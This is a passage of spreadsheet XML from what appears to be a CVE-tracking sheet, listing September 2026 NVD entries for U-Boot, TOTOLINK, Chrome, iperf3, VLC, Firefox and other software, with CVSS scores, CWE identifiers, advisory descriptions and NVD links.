          <t>U-Boot before 2026.10-rc5 contains a buffer overflow in nfs_read_reply() function in net/nfs-common.c that allows attackers to corrupt memory by supplying crafted NFS READ reply lengths. A malicious NFS server can exploit signed integer handling to bypass length validation and write far past the destination buffer, crashing the bootloader or corrupting memory.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74220</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74221</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc5 contains a buffer overflow in nfs_readlink_reply() function in net/nfs-common.c when processing NFS server responses. A malicious NFS server can send crafted READLINK replies with negative or oversized symlink length values to corrupt memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74221</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94953</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formAjaxSet using the topicurl=setting/setWiFiRepeaterConfig branch and the ApCliWEPKey field.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94953</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94954</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formFilter (access-control / URL filter configuration handler) and is triggered by the url request parameter when the addFilterUrl (or addFilterUrlFlag) action flag is set.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94954</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95362</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Cross-site request forgery in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95362</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100700</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S20"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20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100700</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102253</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>iperf3 versions prior to 3.22 contains a denial of service vulnerability that allows unauthenticated remote attackers to crash-loop the server's UDP receive worker into an unrecoverable infinite loop by sending a single crafted control-channel parameter message followed by one 16-byte UDP datagram. Attackers can permanently pin the affected per-stream receive thread at approximately 100% CPU usage, rendering the server unusable until forcibly killed with SIGKILL, as the process does not respond to normal control-channel closure.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102253</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103043</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>node.js, express, requests, gin</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S22"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22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103043</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 8.7)</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61519</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>vite</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S23"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23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61519</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.9 → 8.6)</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102911</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in zosmaai pi-llm-wiki up to 0.11.7. Affected is an unknown function of the file mcp/index.ts of the component wiki_capture_source MCP tool. Executing a manipulation of the argument url can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. Upgrading to version 0.11.8 is able to address this issue. This patch is called 360867034e79175b45c8e04a98e4ca712bbaca35. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102911</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.1 → 8.5)</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102794</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Ziroom ZHOME A0101 1.0.1.0. This issue affects some unknown processing of the file /api/ZRnetwork/ping. Such manipulation of the argument url leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102794</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.8 → 8.5)</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102875</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>VLC media player before 3.0.24 contains a path traversal vulnerability in the skins2 ThemeLoader that fails to validate member names in .vlt skin archives. Attackers can craft malicious skin files with path traversal sequences to write arbitrary files with VLC user privileges, enabling code execution through Lua script injection.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102875</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79403</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>An issue in Kilo Code before v7.4.1 allows a local attacker to execute arbitrary code via the permission/allow-everything endpoint</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79403</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100702</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S28"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28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100702</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100756</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Incorrect boundary conditions in the Audio/Video: Playback component. This vulnerability was fixed in Firefox ESR 153.4, Thunderbird 157, Thunderbird 140.17, Thunderbird 153.4, Firefox 157, Firefox ESR 115.42, and Firefox ESR 140.17.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100756</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95301</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95301</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95344</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Race condition in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass site isolation via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95344</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95376</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
